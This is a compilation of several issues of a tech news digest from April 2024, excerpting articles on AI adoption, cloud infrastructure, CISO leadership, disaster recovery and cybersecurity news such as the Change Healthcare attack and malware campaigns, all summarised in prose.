Daily Tech Digest - April 08, 2024

Streamlining application delivery and mitigating risks for critical infrastructure

The emphasis on cloud and edge computing introduces challenges in orchestrating seamless application delivery—the initial hurdle in effectively packaging applications for efficient deployment, installation, and execution across various computing environments. For instance, food delivery platforms, such as Zomato or Swiggy, require timely system updates for operational efficiency. The second challenge involves addressing latency and distribution unreliability, especially in scenarios where data transfer delays or inconsistent connectivity may impede the seamless and efficient distribution of applications across networks. Therefore, reliability in application upgrades becomes imperative to counter potential disruptions caused by device issues. The third challenge involves maintaining application reliability, which requires continuous performance monitoring. ... The interconnectedness of supply chain applications necessitates a proactive approach to managing complexities, such as addressing software risks. It involves creating a comprehensive bill of materials and recognising dependencies crucial for bundling software into devices or applications.  


How can the energy sector bolster its resilience to ransomware attacks?

For energy companies, this means undertaking systematic vulnerability assessments and penetration testing, with a specific focus on applications that interface between IT and OT systems. It also requires adopting a comprehensive security strategy that includes routine security monitoring, patch management and network segmentation, and implementing rigorous incident reporting and response. Once the fundamentals are in place, energy providers should explore more advanced technologies and automation opportunities that can help reduce the time between detection and response, such as AI-powered tools that can actively monitor the network in real-time to detect anomalies and predict potential threat patterns. ... In addition to technological defenses, organizations should also focus on the human element as phishing and social engineering attacks keep targeting employees and third-party contractors and continue to be effective methods for initial intrusion. Training programs that enhance employee awareness of these and other tactics are essential, while regularly updated sessions can help staff identify and respond to potential threats thereby reducing the likelihood of a successful attack.


Implementing AI Ethics in Business Strategy

In the realm of AI ethics, monitoring and evaluation play a crucial role in ensuring continuous improvement and alignment with ethical standards. By consistently monitoring the outcomes of AI algorithms and evaluating their impact on various stakeholders, organizations can proactively identify ethical concerns and take corrective actions. This dynamic approach not only mitigates potential risks but also fosters a culture of transparency and accountability within the business. Ethical considerations should be integrated into all stages of AI implementation, from design to deployment. Continuous monitoring allows organizations to adapt to changing ethical landscapes, emerging risks, and evolving regulations. ... Emphasizing ethical practices in business is not just a moral obligation but a strategic imperative for long-term success. In today’s interconnected world, consumers are becoming increasingly conscious of the companies they support, favouring those that demonstrate a commitment to ethical values. By prioritizing ethics in decision-making processes and embracing transparency, businesses can build trust with their stakeholders and create sustainable relationships that drive growth.


The 6 Traits You Need To Succeed in the AI-Accelerated Workplace

AI copilots can provide valuable support, but humans need to exercise critical thinking skills to interpret data, make decisions and solve complex problems effectively. For any area of study, there are various levels of understanding. The very basic is "You don't know what you don't know," then comes "You know what you don't know," next up is "You have the knowledge necessary to interact," and the final level is "You are the subject matter expert."  ... Modern-day knowledge workers need to adapt to new technologies and workflows quickly. As a great horse rider becomes one with the animal, their movements are synchronized naturally. In the same sense, modern-day knowledge workers need to become one with AI assistants/bots and synchronize and adapt their style and pace of work with all the latest tools and technologies being introduced. ... Resilience is the most important quality amid this mist of future job landscapes. It is the best quality an employee can have. It will equip one with the mental fortitude to embrace innovation, learn new skills, and confidently navigate unfamiliar territories.


Speaking Cyber-Truth: The CISO’s Critical Role in Influencing Reluctant Leadership

It’s not just about pointing out the problems, the CISO must also be a problem-solver. They must work collaboratively with other leaders to find ways to enable the business while protecting it — providing insights and recommendations that allow others to make informed decisions based on the company’s risk appetite and strategic direction. But the effectiveness of a CISO is not just measured by the absence of breaches; it’s their ability to enable the business to take calculated risks confidently. The CISO must work to ensure that cyber security is built into the DNA of every project. They must advocate and champion secure-by-design principles to ensure that security is not an afterthought but a fundamental component of every initiative. By forcing organizations to acknowledge and address cyber risks proactively, CISOs not only protect the enterprise but also contribute to its resilience and long-term success. CISOs also face the issue of risk prioritization. In an ideal world, every vulnerability would be patched, every threat neutralized, every alert investigated. However, resources are constrained, investments are finite, and not all risks are created equal. 


4 Lessons We Learned From The Change Healthcare Cyberattack

Given the massive scale of the Change Healthcare attack, it goes without saying that the aftermath has been chaotic. Providers and pharmacies were forced to expend time and resources on manual claims processing, and many continue to face payment delays that are hurting their cash flow. Change Healthcare’s parent company, insurance giant UnitedHealth Group, has faced widespread criticism for its handling of the attack. The American Hospital Association has been one of the biggest voices in this regard. In the organization’s March 13 letter to the Senate Finance Committee, the AHA wrote that UnitedHealth has done nothing to materially address “the chronic cash flow implications and uncertainty that our nation’s hospitals and physicians are experiencing” as a result of the attack. The long recovery time indicates a potentially poor business continuity plan (BCP), Kellerman noted. In his eyes, every healthcare organization needs a BCP in case of a potential cybersecurity event. “[The plan] should address business continuity in case of crisis or disaster, including backups and the ability to restore them in a timely manner. 


Is HR ready for generative AI? New data says there's a lot of work to do

The potential risks for AI in HR are rooted in a lack of trust and potential bias in AI delivering recommendations or suggestions based on models that may have been unintentionally trained on datasets that reinforce biases. Core HR functions could also be impacted by data compromises, AI hallucinations, bias, and toxicity. The common theme across all these areas of potential risk is the human steps that can mitigate them. AI adoption in HR is on the rise. Valoir research found that 50% of organizations are either currently using or planning to apply AI to recruiting challenges in the next 24 months, followed closely by talent management and training and development. ... Valoir recommends that HR leaders not only select vendors and technologies that can be trusted, but put in place the appropriate policies, procedures, safeguards, and training for both HR staff and the broader employee population. HR departments will need to consider how they communicate those policies and training to both their internal HR teams and the broader population.


The Complexity Cycle: Infrastructure Sprawl is a Killer

From imperative APIs that required hundreds of individual API calls to configure a system to today’s declarative APIs that use only one API call. It’s easier, of course, but only the interface changed. The hundreds of calls mapped to individual configuration settings still need to be made, you just don’t have do it yourself. The complexity was abstracted away from you and placed firmly on the system and its developers to deal with. Now, that sounds great, I’m sure, until something goes wrong. And wrong something will go; there’s no avoiding that either. Zero Trust has an “assume breach” principle, and Zero Touch infrastructure (which is where the industry is headed) ought to have a similar principle, “assume failure.” It’s not that complexity evolves. Complexity comes from too many tools, consoles, vendors, environments, architectures, and APIs. As an enterprise evolves, it adds more of these things until complexity overwhelms everyone and some type of abstraction is put in place. We see that abstraction in the rise of multicloud networking to address the complex web of multiple clouds and microservices networking, which is trying to unravel the mess inside of microservices architectures.


Solar Spider Spins Up New Malware to Entrap Saudi Arabian Financial Firms

JSOutProx is well known in the financial industry. Visa, for example, documented campaigns using the attack tool in 2023, including one pointed at several banks in the Asia-Pacific region, the company stated in its Biannual Threats Report published in December. The remote access Trojan (RAT) is a "highly obfuscated JavaScript backdoor, which has modular plugin capabilities, can run shell commands, download, upload, and execute files, manipulate the file system, establish persistence, take screenshots, and manipulate keyboard and mouse events," Visa stated in its report. "These unique features allow the malware to evade detection by security systems and obtain a variety of sensitive payment and financial information from targeted financial institutions. JSOutProx typically appears as a PDF file of a financial document in a zip archive. But really, it's JavaScript that executes when a victim opens the file. The first stage of the attack collects information on the system and communicates with command-and-control servers obfuscated via dynamic DNS. 


Biggest AI myths in customer experience

Recent months have seen numerous examples of chatbots going rogue and tarnishing the reputation of the organisations that implemented them. From incorrect refund policies costing a Canadian airline hundreds of dollars to a parcel delivery firm swearing at customers, GenAI is not ready to take off the training wheels just yet. Large language models (LLMs) such as ChatGPT are subject to hallucinations which, without safeguards, could negatively impact the customer experience. Customers would quickly lose patience with brands if they were misled during interactions. A tool that should vastly improve first-contact resolution could achieve the opposite, with customers needing further support to correct previous mistakes. That said, it is possible to reduce the likelihood of egregious chatbot errors through appropriate optimisation techniques.  ... The implementation of AI in CX should be a gradual process. If phase one of AI development was to streamline communications before, during and after interactions, future phases should focus on expanding the scope of the contact centre, encompassing more traditionally back-office and professional roles and creating a hub for communications, relationship building and data orchestration.



Quote for the day:

"To have long-term success as a coach or in any position of leadership, you have to be obsessed in some way." -- Pat Riley

Daily Tech Digest - April 07, 2024

AI advancements are fueling cloud infrastructure spending

The IDC report offers insights into the evolving landscape of cloud deployment infrastructure spending, explicitly focusing on AI. I’m not sure that anyone will push back on that. However, there are some other market dynamics that we should be paying attention to, namely:Tech leaders’ rapid deployment of AI capabilities is changing infrastructure requirements, emphasizing the need for specialized, high-performance hardware. However, this will likely translate quickly into storage and databases, which are more critical to AI than processing. Who would have thunk? The shift towards GPU-heavy servers at higher price points but fewer units sold reflects the evolving market dynamics influenced by the priorities of cloud providers and enterprise tech behemoths. As I pointed out, this could be a false objective that leads many, including the cloud providers, down the wrong path. ... The significant uptick in cloud infrastructure spending underscores a robust investment in AI-related capabilities, which has far-reaching implications for technology and business landscapes.


How to develop your skillset for the AI era

Grounded in a rich understanding of the broader context and enhanced by a diverse skill set, building specialization will ensure that engineers can bring unique insights, creativity, and solutions that AI cannot. It's the intersection of depth and breadth in an engineer's expertise that will define their irreplaceability in an AI-driven world. This is where Roger Martin's Doctrine of Relentless Utility comes into play, a career strategy that focuses on finding your niche and monopolizing it. As you become more adept at navigating between different roles and perspectives, you'll be better positioned to uncover unique opportunities where your particular blend of skills and interests intersect with unmet needs within your team or organization. Aligning what you're good at with areas where you can make a significant impact allows you to establish a distinctive role that plays to your strengths and passions. This strategy promotes an active, value-driven approach, looking for ways to contribute beyond the usual scope of your role. Your niche could be bridging the gap between advanced technical knowledge and non-technical stakeholders or clients.


A phish by any other name should still not be clicked

The proper way for enterprises to reach out on these matters is something like, “There is a new billing matter that requires your attention. Please log into your portal and look into it.” Why don’t most enterprises do that? Some blame a lack of training — and there is absolutely a lot of truth in that. But, it’s often quite deliberate and intentional. More responsible enterprises have tried doing this the proper way, but too many customers complained along the lines of, “Do you know how many portals I have to deal with? Give me a link to the portal you want me to use.” ... This gets us right back to the security-vs.-convenience nightmare. This problem is complicated because the situation is two-step. It’s not that the customer will be hurt if they click on your link. It’s that you’re inadvertently making them comfortable with clicking on an unknown link and they might get hurt two days from now when they encounter an actual phishing attack email. Will the enterprise be held liable, especially if you can’t prove the victim clicked because of what was sent? It gets even worse. The old advice used to be to mouseover suspicious links and make sure they’re legitimate. Today, that advice doesn’t work. 


How to keep humans in charge of AI

First, let users choose guardrails through the marketplace. We should encourage a large multiplicity of fine-tuned models. Different users, journalists, religious groups, civil organizations, governments and anyone else who wants to should be able to easily create customized versions of open-source base models that reflect their values and add their own preferred guardrails. Users should then be free to choose their preferred version of the model whenever they use the tool. This would allow companies that produce the base models to avoid, to the extent possible, having to be the “arbiters of truth” for AI. While this marketplace for fine-tuning and guardrails will lower the pressure on companies to some extent, it doesn’t address the problem of central guardrails. Some content — especially when it comes to images or video — will be so objectionable that it can’t be allowed across any fine-tuned models the company offers. ... How can companies impose centralized guardrails on these issues that apply to all the different fine-tuned models without coming right back to the politics problem Gemini has run head-long into? 


Managers tend to target loyal workers for exploitation, study finds

The researchers hypothesized that managers might view loyal employees as more exploitable, targeting them for exploitation. Alternatively, they considered whether managers might protect loyal workers to retain their allegiance. Four studies were conducted with participants ranging from 211 to 510 full-time managers, recruited via Prolific. In the first study, managers were split into three groups, with the first group reading about a loyal employee named John. The survey then described scenarios requiring someone to work overtime or perform uncomfortable tasks without compensation, querying the likelihood of assigning John to these tasks. The second and third groups underwent similar procedures, but with John described as either disloyal or without any characterization. All participants assessed John’s willingness to make personal sacrifices. ... “Given that workers who agree to participate in their own exploitation also acquire stronger reputations for loyalty, the bidirectional causal links between loyalty and exploitation have the potential to create a vicious circle of suffering for certain workers.” The study sheds light on the relationship between workers’ loyalty and behaviors of managers. 


Mastering the CISO role: Navigating the leadership landscape

CISOs must also cultivate stronger partnerships with their C-suite counterparts. IDC’s survey revealed discrepancies in how CISOs and CIOs perceive the CISO’s role, underscoring the need for better alignment. Creed recounted a recent example where the Allegiant Travel board made decisions about connected aircraft without involving the CISO, leading to a last-minute “fire drill” to address cyber security requirements. “Do you think the board, when they first started talking of going down this path of ‘we’re going to expand the fleet’, considered that there might be security implications in that?” he asked. ... To bridge this gap, CISOs must proactively educate executives on the business implications of security risks and advocate for a seat at the strategic decision-making table. As Russ Trainor, Senior Vice President of IT at the Denver Broncos, suggested, “Sometimes I’ll forward news of the breaches over to my CFO: here’s how much data was exfiltrated, here’s how much we think it cost. Those things tend to hit home.” The evolving CISO role demands a delicate balance of technical expertise, business acumen, and communication prowess. 


How companies are prioritising employee health for organisational success

The HR folks have a critical role in implementing wellness initiatives, believes Ritika. “Fostering a supportive work culture, providing resources for physical and mental health, and advocating for policies that prioritise employee well-being to attract and retain talent effectively are the key priorities for HR leaders are the key responsibilities of HR leaders.” According to Ritika, investing in employee health and well-being is not just a commitment but a cornerstone of organisational ethos. The Human Resource (HR) department plays a pivotal role in promoting and protecting the health of employees within an organisation. As per a report, an alarming 43% of Indian tech workers encounter health issues directly linked to their job responsibilities. Additionally, the study indicates that these health issues go beyond physical ailments, with almost 45% of respondents facing mental health challenges like stress, anxiety, and depression. Samra Rehman, Head of People and Culture, Hero Vired says that HR leaders are responsible for establishing policies and programs that prioritise employee well-being, such as implementing health insurance plans, offering gym memberships or fitness classes, and organising wellness workshops.


Decoding Synchronous and Asynchronous Communication in Cloud-Native Applications

The choice between synchronous and asynchronous communication patterns is not binary but rather a strategic decision based on the specific requirements of the application. Synchronous communication is easy to implement and provides immediate feedback, making it suitable for real-time data access, orchestrating dependent tasks, and maintaining transactional integrity. However, it comes with challenges such as temporal coupling, availability dependency, and network quality impact. On the other hand, asynchronous communication allows a service to initiate a request without waiting for an immediate response, enhancing the system’s responsiveness and scalability. It offers flexibility, making it ideal for scenarios where immediate feedback is not necessary. However, it introduces complexities in resiliency, fault tolerance, distributed tracing, debugging, monitoring, and resource management. In conclusion, designing robust and resilient communication systems for cloud-native applications requires a deep understanding of both synchronous and asynchronous communication patterns. 


Hackers Use Weaponized PDF Files to Deliver Byakugan Malware on Windows

Due to their high level of trust and popularity, hackers frequently use weaponized PDF files as attack vectors. Even PDFs can contain harmful codes or exploits that abuse the flaws in PDF readers. Once this malicious PDF is opened by a user unaware of it, the payload runs and infiltrates the system. ... FortiGuard Labs discovered a Portuguese PDF file distributing the multi-functional Byakugan malware in January 2024. The malicious PDF tricks people into clicking a link by presenting a blurred table. This in turn activates a downloader that puts a copy (requires.exe) and takes down DLL for DLL-hijacking. This runs require.exe to retrieve the main module (chrome.exe). In particular, the downloader behaves differently when called require.exe in temp because malware evasion is evident. FortiGuard Labs discovered a Portuguese PDF file distributing the multi-functional Byakugan malware in January 2024. The malicious PDF tricks people into clicking a link by presenting a blurred table. This in turn activates a downloader that puts a copy (requires.exe) and takes down DLL for DLL-hijacking.


Cybercriminal adoption of browser fingerprinting

While browser fingerprinting has been used by legitimate organizations to uniquely identify web browsers for nearly 15 years, it is now also commonly exploited by cybercriminals: a recent study shows one in four phishing sites using some form of this technique. ... Browser fingerprinting uses a variety of client-side checks to establish browser identities, which can then be used to detect bots or other undesirable web traffic. Numerous pieces of data can be collected as a part of fingerprinting, including:Time zone; Language settings; IP address; Cookie settings; Screen resolution; Browser privacy; User-agent string. Browser fingerprinting is used by many legitimate providers to detect bots misusing their services and other suspicious activity, but phishing site authors have also realized its benefits and are using the technique to avoid automated systems that might flag their website as phishing. By implementing their own browser fingerprinting controls loading their site content, threat actors are able to conceal phishing content in real-time. For example, Fortra has observed threat actors using browser fingerprinting to bypass the Google Ad review process. 




Quote for the day:

"What you do has far greater impact than what you say." -- Stephen Covey

Daily Tech Digest - April 06, 2024

'Leadership? No, Thank You': Navigating A New Organizational Environment Model

The culture that pushes people to be leaders frequently sugarcoats a position like that by showing all the advantages, juicy challenges, fancy bonuses and sparkly cars. The reality is that the responsibility is heavy and being a leader is a lot closer to being a psychologist/coach/rescuer/mom/dad than a hands-on worker. A leadership position calls for emotional intelligence growth, great adaptability and, believe it or not, ego detachment. A great leader is one who does not hoard talent but lets people fly, knows that the best team is made of people who are different from and better than they are, learns how to hold pressure and remain calm and, above all, can be trusted. Show workers this truth. ... Sometimes, not wanting a leadership position may indicate simply that one is afraid of it and not that one doesn’t want it. We all know that. Companies can and must push people out of their comfort zones but also need to maintain a balance of respecting their preferences. How? Training them before a leadership role. Yes. Most companies train leaders after they have assumed a leadership role. 


Modern Application Management Requires Deeper Internet Visibility

Unfortunately, most IT teams today have limited ability to discern how the performance of Internet services is impacting their applications. There are, of course, Internet performance management (IPM) tools capable of surfacing network performance metrics. The challenge and opportunity now is to surface those metrics in context with all the other telemetry data that DevOps teams collect from the various application performance management (APM) and observability platforms they rely on to monitor and troubleshoot application environments. ... Broadly, there are three major classes of blind spots that impact distributed application performance. The first and arguably most opaque are the services provided by third-party vendors. Ranging from content delivery networks (CDNs) to software-as-a-service (SaaS) application, each of these services is controlled by an external service provider that typically doesn’t allows a DevOps team to collect telemetry data by deploying agent software in their IT environments. At best, they may expose an application programming interface (API) to enable an agentless approach to collecting data, but that method doesn’t typically provide the level of control required to optimize application performance.


Ruby on Rails Is Not Dead and May Even Be AI Panacea for Devs

Ruby on Rails has always been promoted as a tool that a single person can use to create a web application — that’s why it was so popular with Web 2.0 entrepreneurs. The Rails website in April 2005 described the framework as “a full-stack, open-source web framework in Ruby for writing real-world applications with joy and less code than most frameworks spend doing XML sit-ups.” While XML is no longer a factor in 2024, DHH continues to do interviews espousing the “joy and less code” philosophy. In an interview with the devtools.fm podcast last month, he even suggested this approach will help developers adapt in the current generative AI era. “As we are now facing perhaps an existential tussle with AI,” he said, “I think it’s never been more important that the way we design programming languages is designed for the human first. The human needs all the help the human can get, if we’re going to have any chance to remain not only just valuable, but relevant as a programmer. And maybe that’s a lost cause anyway, but at least in the last 20 years that I’ve been working with Ruby on Rails, I’ve seen that bet just pay [off] over and over again.”


Business leaders can no longer afford to wait until disruptions occur to measure their financial impact. They need insights to protect the customer and their financial bottom line as quickly and seamlessly as possible. AI and ML provide the means to achieve such agility, offering “quick wins” in the form of immediate financial value. By harnessing accelerators to automate data capture and deliver intelligent insights at the point of disruption, reducing lead time to capture data from several weeks to near real time, they obtain optimized recommendations at the point of disruption across the value network, thus protecting the customer experience and the financial impact on the business in near real time. ... AI contributes to decision intelligence in supply chains. A good example of decision-making processes that have been enhanced by AI is the Amazon Scan, Label, Apply & Manifest (SLAM) process. When a customer places an order, there are multiple microservices and intelligent algorithms that run to find the most optimal way to fulfill it, based on the customer promise and best financial business outcome. 


Is AI driving tech layoffs?

GenAI simply isn’t ready yet. Just like the internet of 1999, the genAI tools of 2024 will eventually get there. But in the meantime, I predict, as Gartner would put it, we’re heading quickly to the “Trough of Disillusionment.” That’s where the initial burst of excitement over a new technology runs out and everyone realizes the reality isn’t close to what we all dreamed it would be. I’ve seen too many of these bubbles over the years and still we fall for it every time. What’s different now, and why the coming fall will hurt so much, is that almost every company has fallen under the genAI spell. Not only are businesses planning to move to it, they’re already replacing the people they need to get their work done with half-baked AI models. This is going to greatly accelerate the coming crash. Don’t get me wrong. GenAI will eventually replace some jobs. But former US. Treasury Secretary and current OpenAI board member Larry Summers gets it right. He recently said, “If one takes a view over the next generation, this could be the biggest thing that has happened in economic history since the Industrial Revolution.”


Unlocking the Power of Generative AI in Banking: Insights from Microsoft’s Daragh Morrissey

The first use case I would start with is your developers. It’s the most mature generative AI scenario. And as you build new applications for this, why not build them with generative AI? Then I would think about the out-of-the-box AI, gen AI that you’ll get from us if you start introducing it to Teams and Office. You’ll hit a ton of use cases there that are sort of horizontal across the whole business. Then, you’ll be left with a set of custom use cases. These could be things like I would start; you could start with a contact center, just enhancing what you currently have in your contact center. You don’t have to rip out your contact center, either. It’s just about sort of adding the capabilities on top. Building a knowledge base is also a great way of learning how to use this inside the organization. ... One of the things we did as well was create this concept of a citizen developer or citizen data scientist. You could just take a set of data, and we can prompt you to say, “It looks like you need one of these models, that could be sentiment analysis or something.” Then, it will build a model with the data.


Critical Bugs Put Hugging Face AI Platform in a 'Pickle'

In examining Hugging Face's infrastructure and ways to weaponize the bugs they discovered, Wiz researchers found that anyone could easily upload an AI/ML model to the platform, including those based on the Pickle format. Pickle is a widely used module for storing Python objects in a file. Though even the Python software foundation itself has deemed Pickle as insecure, it remains popular because of its ease of use and the familiarity people have with it. "It is relatively straightforward to craft a PyTorch (Pickle) model that will execute arbitrary code upon loading," according to Wiz. Wiz researchers took advantage of the ability to upload a private Pickle-based model to Hugging Face that would run a reverse shell upon loading. They then interacted with it using the Inference API to achieve shell-like functionality, which the researchers used to explore their environment on Hugging Face's infrastructure. That exercise quickly showed the researchers their model was running in a pod in a cluster on Amazon Elastic Kubernetes Service (EKS). ... With Hugging Face Spaces, Wiz found an attacker could execute arbitrary code during application build time that would let them examine network connections from their machine.


Sophisticated Latrodectus Malware Linked to 2017 Strain

While initial analysis suggested Latrodectus is a new variant of IcedID, subsequent research found that it is a new malware most likely named Latrodectus because of a string identified in the code. Latrodectus employs infrastructure used in historic IcedID operations, indicating potential ties to the same threat actors. IcedID, first discovered in 2017, has been described as a banking Trojan and remote access Trojan. Researchers discovered insights into the activities of threat actors TA577 and TA578 - the primary distributors of Latrodectus that illustrate the evolving tactics threat actors have used over time. TA577, previously known for its distribution of Qbot, used Latrodectus in three campaigns in November 2023 before switching back to Pikabot. In contrast, TA578 has been predominantly distributing Latrodectus since mid-January 2024, using contact forms and impersonation techniques to deliver the malware to targets. Latrodectus functions as a downloader, and its primary objective is to download payloads and execute arbitrary commands. Its sandbox evasion techniques are noteworthy, and it shares similarities with the IcedID malware. 


Deceptive AI: The Human-Machine Romance

Like God, AI bots assure us they are omnipresent and omniscient and can be a panacea for all our emotional needs, a claim that is too good to be true. All of us, at different points in our lives, have witnessed miserable Bot failures while responding to well-scoped, structured and sequenced business processes. Then how on earth do we even believe a neural network can handle complex, unstructured human emotions? The outcomes will be insanely unpredictable. That is what exactly happened with 21-year-old Jaswant Singh Chail when he was coerced by a romantic chatbot to break into Windsor Castle to kill the Queen of England. He is now serving a prison sentence, still firmly believing the AI bot is an incarnation of the angel who will eventually reunite with him. Don’t see this scenario in isolation; such AI bots in the hands of extremists can be a game changer in recruiting and radicalizing younger minds to carry out unspeakable crimes (Remember gory effects of the suicidal game “Blue Whale”?); unethical business houses can leverage such channels to boost their product sales.


Six reasons to go colo

Historically, enterprises have built, equipped, and operated their own data centers according to need – both capacity needs and on different geographical locations. While this approach has qualities in terms of being tailor-made for your specific operations – the infrastructure lacks the scalability, flexibility and sometimes even cloud connectivity required to gain and keep a competitive advantage in today’s fast-paced markets. Furthermore, the investments related to constructing your own data center are highly capital-intensive, which makes it difficult for some companies to pursue such a strategy. Against this background, the reasons for the fast-paced growth of the data center colocation industry becomes easy to grasp. Data center colocation is a considerably more accessible, scalable, and cost-efficient solution for your facility. When using data center colocation, you consume the physical data center ‘as a service’. The often-used expression ‘let your business focus on what it does best’ applies well here. You get the peace-of-mind knowing your ground-bounded infrastructure has a secured uptime and you leave the matters of cooling, electricity supply and physical security to a partner who is an expert in exactly that.



Quote for the day:

"You may only succeed if you desire succeeding; you may only fail if you do not mind failing." -- Philippos

Daily Tech Digest - April 05, 2024

Time for a Disaster Recovery Health Check

By law, the board and C-level officers have the responsibility of executing due diligence and competence in the conduct of company operations and asset securement. They do not want to see gaping holes and exposures in corporate due diligence that are due to disaster recovery plans that fail to address new security threats or the presence of edge technology. This board awareness can give IT the leverage it needs to prioritize its DR plan update so the revised plan can cover a much broader IT footprint than just the central data center -- and by doing so, address new risks. A good way to present to the board and corporate officers a need to invest time and resources into a DR plan update is to present the need for an update along with the risks of not doing one. This can be accomplished by describing various disaster scenarios that have actually happened to other organizations and explain how they could plausibly happen to the company itself. By showing real life situations, the CIO can present the most likely disaster scenarios and consequences and what is needed in terms of plan revisions and investments to minimize those risks.


Mastering HTTP DDoS attack defence: Innovative strategies for web protection

The threat landscape for HTTP DDoS attacks is constantly expanding, with attackers continually developing new techniques to evade detection. Some common methods include using HTTP GET or POST requests to consume server resources, leveraging malformed HTTP headers to confuse web applications, and employing slowloris attacks that open and maintain multiple connections to the server without closing them, eventually exhausting server resources. These attacks can have devastating effects on businesses, including service disruption, loss of customer trust, and significant financial losses. The need for effective mitigation strategies has never been more critical. ... While Radware’s products offer robust protection against HTTP DDoS attacks, it’s essential for businesses to adopt a proactive security posture. Some best practices include:Regularly Updating Security Systems: Ensure that all security systems are up to date with the latest signatures and detection algorithms. Implementing Access Control Lists (ACLs): Use ACLs to restrict access to resources, minimising the potential impact of an attack. 


5 Cybersecurity Questions Boards Can’t Afford To Ignore

When it comes to cybersecurity incident response, companies need to practice, practice, practice. For the board, that could look like ensuring there are not only clear steps in place for what needs to happen should an incident occur but also ensuring that those steps have been practiced ahead of time in some sort of tabletop exercise—similar to how you’d practice exiting the building during a fire drill to know where to go in the event of an emergency. ... While it’s not a requirement, some businesses have decided to add a cybersecurity or technology expert directly to the board to guide them on risk. Businesses can decide if this makes sense for their risk needs depending on their individual risk profiles. Many former CISOs or former cybersecurity leaders are looking to sit on or advise boards, as well as businesses’ own CISOs. ... Directors should also ask themselves if they are budgeting enough for cybersecurity across the organization. They should also work to understand what financial impacts or even regulatory fines they could face if they don't invest in cybersecurity appropriately or report incidents as required. Is your organization investing enough?


Is it Already Too Late to Get Started with GenAI? No, But the Clock’s Ticking

At some point institutions will bite the bullet and let GenAI interact with customers or with their live data. Smith believes it will be important to alert customers when they are offered a product or process in which generative artificial intelligence plays a role. Both staff and the public must be clear on this and have confidence in what the bank discloses. Some consumer paranoia exists about GenAI, but Smith says Accenture research indicates that many customers will accept its use with their data — if they feel that they are receiving some benefit in return. Asked for an example, Smith points to a frequent beef about bank customer service — having to explain a situation all over again when trying to work out a problem or address a need and being transferred from one staffer to another. “I shouldn’t have to educate you on what happened two days ago,” says Smith. “I want to walk in and find that you already know.” GenAI can help with this type of situation. One last pointer from Smith concerns the customer experience of using processes controlled by GenAI. She says that some customer-facing GenAI provides inferior look and feel, which can become a friction point.


Technical Debt and the Hidden Cost of Network Management: Why it’s Time to Revisit Your Network Foundations

An often-overlooked example of this growing debt is a failure to actively manage and optimize IP addresses and Domain Name System (DNS) configurations—the very pillars of corporate network communication. Internet service providers (ISPs) of dedicated Internet access (DIA) to businesses would often assign blocks of addresses to customers. If those customers ever cancel or change providers, there's often a clean-up process to recover those resources. Businesses going through reorganizations or mergers and acquisitions may lose track (or may never have had good records) of IP address ranges. Security policies and routing policies may then become outdated, leaving an IP address hijacker a window inside the perimeter security measures. Companies using Network Address Translation (NAT) or Carrier-Grade NAT (CGNAT) to share one IP address among many devices may find that those functions, which edit data packets in flight, create unexpected failure modes. Sometimes, they hide problems, such as when malware or address snooping is happening within the boundary of the NAT. 


Bank Four Zeros Crucial for Banking Resilience, says Huawei

“Banking Everywhere means that, from a technology point of view, we have to make sure that any transactions should 100% not result in any problems or risks. It’s not easy. For example, on the Tube in London, how do you deliver 5G to enable transactions? Banking Everywhere is easy to say, but hard to do.” Cao highlights the high availability and easy migration of GaussDB. He says after GaussDB was deployed in one of the biggest banks in China, the recovery time objective (RTO) was slashed to 120 seconds – a world-leading level. He says Huawei is working on reducing this to just 30 seconds. ... “Some banks say we are in the AI era, some say the intelligent era, some say the open banking era, but a lot of banks still struggle working with a traditional model. So today it is like a multi-generational industry,” he says. “On the one hand, exciting things are coming, like Gen AI, and we have to be prepared. We have to be realistic to see what challenges we face today. If a bank is not resilient enough, it’s very hard to embrace Gen AI, or any intelligent opportunities.


The Three Pillars of HIPAA Compliance

Policies and procedures must be developed on all aspects of HIPAA but not just to allow boxes to be ticked in a HIPAA compliance checklist. That may be sufficient to pass a very basic document review, but policies alone will not make an organization HIPAA compliant. All members of the workforce must be provided with the policies and must receive training relevant to their role. Every individual in a healthcare organization has a role to play in making their organization HIPAA compliant and must be trained to allow them to perform their duties in a HIPAA-compliant way. Employees should not have to guess how HIPAA applies. In addition to training, employees must be made aware of the sanctions policy and the repercussions of HIPAA violations and the sanctions policy must be enforced. HIPAA calls for training to be provided during the onboarding process, regardless of whether a new hire is a seasoned healthcare professional or is new to the industry. It is the responsibility of the compliance officer to ensure that appropriate training programs are developed and that all members of the workforce receive adequate training. 
And herein lies the problem, says Ma: When business stakeholders seek to understand EA’s value proposition, or even check the status of a project, they may get different answers depending on whom they ask. It’s the three-blind-men-describing-an-elephant problem: The man who feels the tail describes an animal very different from the one described by the man feeling the abdomen, or by the one feeling the ears and tusks. Though the variety in their descriptions may reflect the function’s comprehensiveness, to the uneducated executive, it sounds like misalignment. ... First, the full-stack architect could ensure the function’s other architects are indeed aligned, not only among themselves, but with stakeholders from both the business and engineering. That last bit shouldn’t be overlooked, Ma says. While much attention gets paid to the notion that architects should be able to work fluently with the business, they should, in fact, work just as fluently with Engineering, meaning that whoever steps into the role should wield deep technical expertise, an attribute vital to earning the respect of engineers, and one that more traditional enterprise architects lack.


What is cloud native and how can it generate business value?

Cloud-native workloads are conceived with the cloud in mind, focusing on scalability, agility, and application independence. Building applications directly in the cloud is a core component of agile development and DevOps practices, allowing developers to quickly update their stack to meet business needs. A definitive example of cloud-native workloads would be microservices, in which different elements of an application run in parallel as independent services, communicating via application programming interfaces (APIs). ... “Companies who deliver cloud services have demonstrated that they can … free us up from having to manage infrastructure hands-on,” Purcell tells ITPro. In the “old days,” Purcell explains, a prospective provider of cloud-native services would have had to rent property, procure hardware, and have a core IT team capable of establishing a framework to deliver the application. “By running it in the cloud … you just don't have to do any of that,” Purcell says. Because the main public cloud providers continue “building for builders,” as Purcell puts it, cloud native continues to be a dominant concept. Of course, applications in the private cloud can be cloud native as well.


Why It’s Time to Rethink Generative AI in the Enterprise

One of the biggest changes is the increasing availability of foundation models beyond those supplied by companies that specialize in generative AI services. In addition to open-source models that have been released by companies like Meta and Google, we’re now seeing vendors like SAP developing their own foundation models. Crucially, these models will provide greater opportunity for enterprises to custom-model operations by injecting their own parameters to control the context in which the model operates. In some cases, they can also train or retrain models on custom data. ... Integrating AI models with all the data that exists in a business is a complex task, not least because it is often unclear which dataset is most relevant for a specific use case. For instance, when querying sales data, should the model be prompted using data from the ERP system, the CRM, a manually prepared spreadsheet, or something else? To tackle this issue, businesses are likely to adopt what I refer to as “data dispatchers.” A data dispatcher is an integration tool that efficiently exposes data to GenAI services in an efficient way, making it easy for enterprises to leverage their data for custom model training. 



Quote for the day:

